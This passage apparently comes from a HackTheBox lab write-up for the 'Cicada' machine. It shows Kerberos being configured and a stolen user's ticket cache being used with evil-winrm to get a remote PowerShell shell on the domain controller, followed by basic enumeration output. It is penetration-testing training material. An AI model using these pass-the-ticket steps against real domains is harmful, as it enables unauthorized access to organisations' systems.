WinRM
The emily.oscars
user has been compromised and TGT was generated. The user has a |membership to the Remote Management Users
group, allowing the user to WinRM to the target system. This was enumerated from LDAPDomainDump and BloodHound
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ echo -e '[realms]\n\n\tCICADA.HTB = {\n\t\tkdc = cicada-dc.cicada.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
CICADA.HTB = {
kdc = cicada-dc.cicada.htb
}
Setting up the /etc/krb5.conf
file forpass_the_ticket
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ KRB5CCNAME=emily.oscars@cicada-dc.cicada.htb.ccache evil-winrm -r CICADA.HTB -i cicada-dc.cicada.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DC
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::29
IPv6 Address. . . . . . . . . . . : dead:beef::46c0:3971:5ebf:3844
Link-local IPv6 Address . . . . . : fe80::f65a:ca26:f7f6:2508%6
IPv4 Address. . . . . . . . . . . : 10.129.41.192
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%6
10.129.0.1
Initial Foothold established to the target system as the emily.oscars
user via WinRM